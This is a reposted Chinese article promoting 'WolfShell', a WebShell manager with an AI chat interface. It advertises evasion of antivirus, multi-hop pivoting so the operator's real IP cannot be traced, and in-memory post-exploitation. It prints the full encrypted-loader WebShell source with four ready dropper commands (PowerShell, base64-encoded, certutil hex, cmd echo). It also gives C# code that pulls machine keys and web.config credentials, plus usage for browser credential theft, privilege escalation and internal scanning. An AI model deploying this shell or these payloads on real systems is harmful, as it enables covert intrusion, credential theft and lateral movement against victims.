首款支持AI渗透的WebShell管理工具，聊个天就能实现免杀|实现高隐蔽内网渗透

news2026/3/28 6:23:58

0x01 工具介绍金刚狼首款支持 AI 渗透的 WebShell MCP也是一款支持多层内网级联的 ASPX、ASHX 高级 WebShell 管理工具。工具采用 AES 加密通信无需代理即可实现内网穿透支持内存加载各类渗透工具做到无文件落地隐蔽渗透目标。同时具备动态代码执行、ShellCode 加载、反弹 Shell、Socks 代理、内存马注入等能力聊天即可实现免杀极大提升渗透隐蔽性与后渗透能力适用于高对抗环境下的内网安全测试与横向移动作业。注意现在只对常读和星标的公众号才展示大图推送建议大家把渗透安全HackTwo设为星标⭐️否则可能就看不到了啦下载地址在末尾 #渗透安全HackTwo0x02 功能介绍✨主要功能自定义.NET程序执行.NET程序执行支持内存加载执行自定义.NET程序集快速扩展后渗透能力。AI人工智能使用AI兔杀金刚狼 WebShell 服务端级联内网第3层WebShell 执行Cmd命令通过入口点 192.168.50.106 级联内网 192.168.50.159 再次级联下一层内网 192.168.50.69 WebShell 执行命令PS: 当然也可级联外网比如抓了一些服务器当跳板真正要搞的目标在第3层这样就很难被追踪或溯源到你的真实IP了级联内网第2层WebShell 执行Cmd命令通过入口点 192.168.50.159 级联内网 192.168.50.106 WebShell执行命令WebShell入口点执行Cmd命WebShell入口点执行PowerShell命令/代码whoami代码实现非系统whoami支持命令执行、代码执行长度9K输入info、ver可查看操作系统版本、位数、.NET版本、PowerShell版本信息输入whoami、username可自动转成对应powershell代码查看用户信息Base64加密代码执行示例 base64:ZWNobyBXb2xmU2hlbGwPS C:\Users\adminwhoamiwhoami: IIS APPPOOL\DefaultAppPoolUsername: WIN-021V7TK43N5$PS C:\Users\admininfoOperating System Version: Microsoft Windows Server 2019 Datacenter 64 bitVersion Number: 10.0.17763PowerShell Version:5.1.17763.1.NET Detailed Versions:PSChildName Version Release----------- ------- -------Client 4.7.03190 461814PS C:\Users\adminbase64:ZWNobyBXb2xmU2hlbGwWolfShellPS C:\Users\adminWrite-Host Current User:n$env:USERNAMECurrent User:WIN-021V7TK43N5$文件管理核心优势支持AI渗透支持使用自然语言指挥AI操作WebShell执行命令进行渗透。AI免杀接入AI人工智能聊个天就能免杀WebShell。高效隐蔽的通信采用二进制流传输协议确保通信的高效性与隐蔽性。端到端安全加密所有传输 Payload 均经过 AES加密保护且每次通信使用随机密钥保障数据安全。无痕运行支持直接在内存中加载并执行代码最大程度避免在磁盘留下痕迹显著提升操作隐蔽性和安全性。内网级联WebShell控制通过现有已控的WebShell无需部署代理或配置端口转发即可连接控制更深层内网环境中的WebShell。Hacking后渗透通过已控的 WebShell 在内存中加载渗透工具无需部署代理或配置端口转发即可实现便捷高效的内网横向渗透。语言特征: 服务端(webshell)及payload均为纯英文只有提供的WebShell变种文件包含英文、日文、韩文。0x03 更新介绍内置Web网站探测内存加载 EXE扫描器内置Port端口扫描内存加载 EXE扫描器内置PJL协议探测打印机内存加载 EXE扫描器内置SNMP探测网络设备0x04 使用介绍安装指南下载WolfShell配置环境确保目标环境支持ASPX、ASHX并已正确配置。上传WolfShell将WolfShell文件上传到目标服务器支持ASPX、ASHX、内存马3种类型。WebShell脚本: shell访问WebShell通过工具客户端连接WebShell默认密码 WolfShell修改密码可使用工具上的WolfHash加密。使用环境操作系统windows.NET 版本.NET Framework 4.8命令 | 漏洞 GetShell具备命令执行条件时可通过以下4种方法写入金刚狼 WebShell#PowerShell写入wolf.aspxpowershell -Command Set-Content -Path wolf.aspx -Value % Page Language\C#\ %%if (Request.Cookies.Count ! 0) { byte[] k Encoding.Default.GetBytes(\ca63457538b9b1e0\); System.IO.Stream s Request.InputStream; byte[] c new byte[s.Length]; s.Read(c, 0, c.Length); System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance(\K\).Equals(this); }%#PowerShell命令 Base64写入wolf.aspxpowershell -EncodedCommand UwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAIgB3AG8AbABmAC4AYQBzAHAAeAAiACAALQBWAGEAbAB1AGUAIAAnADwAJQBAACAAUABhAGcAZQAgAEwAYQBuAGcAdQBhAGcAZQA9ACIAQwAjACIAIAAlAD4APAAlAGkAZgAgACgAUgBlAHEAdQBlAHMAdAAuAEMAbwBvAGsAaQBlAHMALgBDAG8AdQBuAHQAIAAhAD0AIAAwACkAIAB7ACAAYgB5AHQAZQBbAF0AIABrACAAPQAgAEUAbgBjAG8AZABpAG4AZwAuAEQAZQBmAGEAdQBsAHQALgBHAGUAdABCAHkAdABlAHMAKAAiAGMAYQA2ADMANAA1ADcANQAzADgAYgA5AGIAMQBlADAAIgApADsAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtACAAcwAgAD0AIABSAGUAcQB1AGUAcwB0AC4ASQBuAHAAdQB0AFMAdAByAGUAYQBtADsAIABiAHkAdABlAFsAXQAgAGMAIAA9ACAAbgBlAHcAIABiAHkAdABlAFsAcwAuAEwAZQBuAGcAdABoAF0AOwAgAHMALgBSAGUAYQBkACgAYwAsACAAMAAsACAAYwAuAEwAZQBuAGcAdABoACkAOwAgAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQAuAEwAbwBhAGQAKABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBSAGkAagBuAGQAYQBlAGwATQBhAG4AYQBnAGUAZAAoACkALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGsALAAgAGsAKQAuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKABjACwAIAAwACwAIABjAC4ATABlAG4AZwB0AGgAKQApAC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAIgBLACIAKQAuAEUAcQB1AGEAbABzACgAdABoAGkAcwApADsAIAB9ACUAPgAnAA#cmd命令 echo certutil 写入wolf.aspxecho 3c25402050616765204c616e67756167653d2243232220253e3c2569662028526571756573742e436f6f6b6965732e436f756e7420213d203029207b20627974655b5d206b203d20456e636f64696e672e44656661756c742e476574427974657328223961613337623163323561303834653022293b2053797374656d2e494f2e53747265616d2073203d20526571756573742e496e70757453747265616d3b20627974655b5d2063203d206e657720627974655b732e4c656e6774685d3b20732e5265616428632c20302c20632e4c656e677468293b2053797374656d2e5265666c656374696f6e2e417373656d626c792e4c6f6164286e65772053797374656d2e53656375726974792e43727970746f6772617068792e52696a6e6461656c4d616e6167656428292e437265617465446563727970746f72286b2c206b292e5472616e73666f726d46696e616c426c6f636b28632c20302c20632e4c656e67746829292e437265617465496e7374616e636528224b22292e457175616c732874686973293b207d253e w.hex certutil -f -decodehex w.hex wolf.aspx del w.hex#cmd命令 echo 写入wolf.aspxecho ^% Page LanguageC# %^ wolf.aspx echo ^% if (Request.Cookies.Count ! 0) { wolf.aspx echo byte[] k Encoding.Default.GetBytes(ca63457538b9b1e0); wolf.aspx echo System.IO.Stream s Request.InputStream; wolf.aspx echo byte[] c new byte[s.Length]; wolf.aspx echo s.Read(c, 0, c.Length); wolf.aspx echo System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance(K).Equals(this); wolf.aspx echo } %^ wolf.aspxC#代码执行获取 ValidationKey 示例代码ValidationKey提取ValidationKey、Validation、DecryptionKey等ViewState反序列化信息usingSystem;usingSystem.Reflection;usingSystem.Web.Configuration;publicclassEval{publicstringeval(Object obj){var sy Assembly.Load(System.Web, Version4.0.0.0, Cultureneutral, PublicKeyTokenb03f5f7f11d50a3a);var mkt sy.GetType(System.Web.Configuration.MachineKeySection);var gac mkt.GetMethod(GetApplicationConfig, BindingFlags.Static | BindingFlags.NonPublic);var cg (MachineKeySection)gac.Invoke(null, newobject[0]);returnValidationKey: cg.ValidationKey | Validation: cg.Validation | DecryptionKey: cg.DecryptionKey | Decryption: cg.Decryption | CompatibilityMode: cg.CompatibilityMode;}}扫描C段存活主机示例代码using System;using System.Net;using System.Net.NetworkInformation;using System.Text;using System.Threading.Tasks;public class Eval{public string eval(Object obj){StringBuilder iplist new StringBuilder();string baseIP 192.168.1.;PingOptions options new PingOptions();options.DontFragment true;var tasks new Task[254];for (int i 1; i 255; i){int ipSuffix i;tasks[i - 1] Task.Run(() {using (Ping myPing new Ping()){PingReply reply myPing.Send(baseIP ipSuffix, 120);if (reply.Status IPStatus.Success){lock (iplist){iplist.AppendLine(Alive IP: reply.Address.ToString());}}}});}Task.WaitAll(tasks);return iplist.ToString();}}CMD命令执行示例代码using System;using System.Diagnostics;public class Eval{public string eval(Object obj){try{Process process new Process();process.StartInfo.FileName cmd.exe;process.StartInfo.Arguments /c whoami;process.StartInfo.UseShellExecute false;process.StartInfo.RedirectStandardOutput true;process.Start();string result process.StandardOutput.ReadToEnd();process.WaitForExit();return result;}catch (Exception ex){return Error occurred: ex.Message;}}}获取web.config密码示例代码web.config读取提取数据库连接信息数据库名、用户、密码、SMTP/邮件服务器用户密码等。using System;using System.Configuration;using System.Text;public class Eval{public string eval(Object obj){try{var connectionStrings ConfigurationManager.ConnectionStrings;var appSettings ConfigurationManager.AppSettings;var result new StringBuilder();foreach (ConnectionStringSettings connectionString in connectionStrings){result.AppendLine(Connection string name: connectionString.Name);result.AppendLine(Connection string value: connectionString.ConnectionString);result.AppendLine();}result.AppendLine();foreach (string key in appSettings.AllKeys){result.AppendLine(Key: key , Value: appSettings[key]);}return result.ToString();}catch (Exception ex){return Error occurred: ex.Message;}}}加密解密算法支持加密算法 BASE64、HEX、ASCII、PowerShell、MD5、SHA1、SHA256、URL编码支持解密算法 BASE64、HEX、ASCII、PowerShell、URL编码金刚狼密码Potato提权示例badpotato提权内网扫描示例Hacking后渗透SSH远程命令执行示例Usage:sshcmd 192.168.50.128 22 root toor idsshcmd 192.168.50.128 22 root toor download /tmp/down.rar c:\down.rarsshcmd 192.168.50.128 22 root toor upload c:\upload.rar /tmp/upload.rarKeybordsshcmd 192.168.50.128 22 root toor download2 /tmp/down.rar c:\down.rarsshcmd 192.168.50.128 22 root toor upload2 c:\upload.rar /tmp/upload.rarMysql数据库连接示例mysqlcmd host port user pass dbname sqlstrmysqlcmd host port user pass dbname sqlb64Demo:mysqlcmd 192.168.50.139 3306 root WolfShell mysql infomysqlcmd 192.168.50.139 3306 root WolfShell mysql SELECT VERSION(); mysqlcmd 192.168.50.139 3306 root WolfShell mysql SELECT 35 mysqlcmd 192.168.50.139 3306 root WolfShell mysql c2VsZWN0IDMrNQ;读取浏览器密码示例SharpWeb浏览器凭据抓取工具支持提取已保存的 Chrome、Firefox、Edge 登录信息与凭据。Usage:SharWeb arg0 [arg1 arg2 ...]Arguments:all - Retrieve all Chrome, FireFox and IE/Edge credentials.full - The same as allchrome - Fetch saved Chrome logins. e.g. -d Directoryfirefox - Fetch saved FireFox logins. e.g. -p masterkey -d Directoryedge - Fetch saved Internet Explorer/Microsoft Edge logins.Demo:SharWeb allSharWeb chromeSharWeb chrome -d C:\OutputSharWeb firefox -p mymasterkey -d C:\OutputSharWeb edgeLadon内网渗透工具示例Usage:Ladon whoamiLadon 192.168.50.159/24 ICMP ICMP存活主机探测Ladon 192.168.50.159/24 PortScan 开放端口服务扫描Ladon 192.168.50.159/24 WebScan 网站标题、中间件Ladon 192.168.50.159/24 SmbInfo SMB存活主机探测、NTLM系统信息Ladon 192.168.50.159/24 NbtInfo NBT存活主机探测、NTLM系统信息Ladon 192.168.50.159/24 WmiInfo WMI存活主机探测、NTLM系统信息Ladon 192.168.50.159/24 LdapInfo LDAP存活主机探测、NTLM系统信息Ladon 192.168.50.159/24 RdpInfo RDP存活主机探测、NTLM系统信息Ladon 192.168.50.159/24 SmtpInfo SMTP存活主机探测、NTLM系统信息Ladon 192.168.50.159/24 HttpInfo HTTP存活主机探测、NTLM系统信息Ladon 192.168.50.159/24 WinrmInfo Winrm存活主机探测、NTLM系统信息Ladon 192.168.50.159/24 MssqlInfo SQL数据库主机探测、NTLM系统信息Ladon 192.168.50.159/24 FtpInfo FTP存活主机探测Ladon 192.168.50.159/24 T3Info Weblogic协议探测Ladon 192.168.50.159/24 CiscoInfo Cisco路由器探测Ladon 192.168.50.159/24 SnmpInfo SNMP设备探测如路由器、交换机等Ladon 192.168.50.159/24 OxidInfo Windows多网卡主机探测Ladon 192.168.50.159/24 EthInfo Windows多网卡主机探测Ladon http://0x7556.org WPinfo WordPress版本、插件探测、漏洞Ladon 192.168.50.159/24 DnsInfo DNS存活主机探测、域名识别内存加载内网扫描器内存加载扫描器只需研发单个IP的.NET程序通过该模块即可变成内存加载的C段扫描器。如只需实现对1个IP的检测、漏洞利用等工具注意类和方法需为 Public自定义工具原始用法F:\pyurltitle.exe 192.168.50.1URL: http://192.168.50.1/ | Status: 200 | Banner: httpd/2.0 | Title: No Title远程内存加载变身内网C段扫描器使用方法将目标 EXE 拖放到“ExePath”文件路径输入框。在“C 段”输入框中填写要扫描的网段例如 192.168.1.0/24。点击“Scan”按钮开始扫描。扫描行为和结果由所加载的 EXE 功能决定。说明加载器默认先通过 ICMPping探测目标是否存活只有存活的主机才会被加载并执行自定义 EXE。若目标网络禁用 ICMP 响应请取消勾选“先行探测/ICMP”选项以跳过探测步骤。 --下载公众号回复20260326获取下载

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/2452389.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！